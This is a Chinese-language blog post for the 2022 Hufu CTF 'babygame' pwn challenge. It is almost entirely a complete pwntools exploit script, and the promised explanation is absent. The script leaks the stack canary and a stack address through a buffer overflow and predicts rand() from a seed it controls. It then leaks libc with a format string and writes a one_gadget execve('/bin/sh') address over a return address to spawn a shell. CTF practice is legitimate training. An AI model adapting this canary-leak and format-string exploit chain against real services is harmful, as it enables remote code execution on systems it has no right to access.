虎符CTF 2022 babygame wp
作者:互联网
先贴下exp,wp晚点来补
完整exp
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
from pwn import *
from ctypes import *
# from LibcSearcher import *
import sys
context(os = 'linux' , arch = 'amd64')
context.terminal = ["tmux", "splitw", "-h"]
local = 1
if local == 0:
io = remote('1.14.71.254',28788)
else:
io = process("/mnt/c/Users/M1sceden4/Desktop/pwn/babygame_虎符CTF_2022")
libc_rand = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
payload_0 = b'a' * (0x120 - 0x18 + 0x1)
io.sendlineafter("Please input your name:\n" , payload_0)
io.recvuntil(b'a'*(0x120 - 0x18 + 0x1))
canary = u64(io.recv(7).rjust(8 , b'\x00'))
stack = u64(io.recv(6).ljust(8 , b'\x00')) #canary会带着后面的rbp一起被输出
success('canary:\t' + hex(canary))
success('stack:\t' + hex(stack))
# print(io.recv())
libc_rand.srand(0x6161616161616161)
for i in range(100):
io.recvuntil("round {}: \n".format(i + 1))
num = libc_rand.rand()
if (num % 3) == 1:
io.sendline('2')
if (num % 3) == 2:
io.sendline('0')
if (num % 3) == 0:
io.sendline('1')
'''one_gadget
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''
elf = ELF("/mnt/c/Users/M1sceden4/Desktop/pwn/babygame_虎符CTF_2022")
pop_rdi_ret = 0x23b72
ret = 0x022679
#ret =
payload_1 = b'%62c%8$hhn-%79$p' + p64(stack - 0x218) #?
io.sendlineafter('Good luck to you.\n' , payload_1)
# gdb.attach(io)
# print(io.recv())
# print(io.recv())
io.recvuntil('-')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_start_main = int(io.recv(14) , 16) - 243
# libc = LibcSearcher('__libc_start_main' , libc_start_main)
libc = elf.libc
success('libc_start_main:\t' + hex(libc_start_main))
success('libc.start_main:\t' + hex(libc.sym['__libc_start_main']))
# libc_base = libc_start_main - libc.dump('__libc_start_main')
libc_base = libc_start_main - libc.sym['__libc_start_main']
success("libc_base:\t" + hex(libc_base))
# system = libc.dump('system') + libc_base
'''system = libc.sym['system'] + libc_base
# bin_sh = libc.dump('str_bin_sh') + libc_base
bin_sh = next(libc.search(b'/bin/sh\x00')) + libc_base
'''
ret += libc_base
pop_rdi_ret += libc_base
# one_gadget = libc_base + 0xe3b31
# payload_2 = fmtstr_payload(6 , {stack : one_gadget})
#payload_2 = b'b' * (0x120 - 0x18) + p64(canary) + p64(0)*3 + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
one_gadget = [0xE3B2E + libc_base, 0xE3B31 + libc_base, 0xE3B34 + libc_base]
payload2 = fmtstr_payload(6,{stack - 0x218:one_gadget[1]})
io.sendlineafter('Good luck to you.\n' , payload2)
io.interactive()
标签:babygame,main,2022,libc,start,CTF,base,io,NULL 来源: https://www.cnblogs.com/M1sceden4/p/16255702.html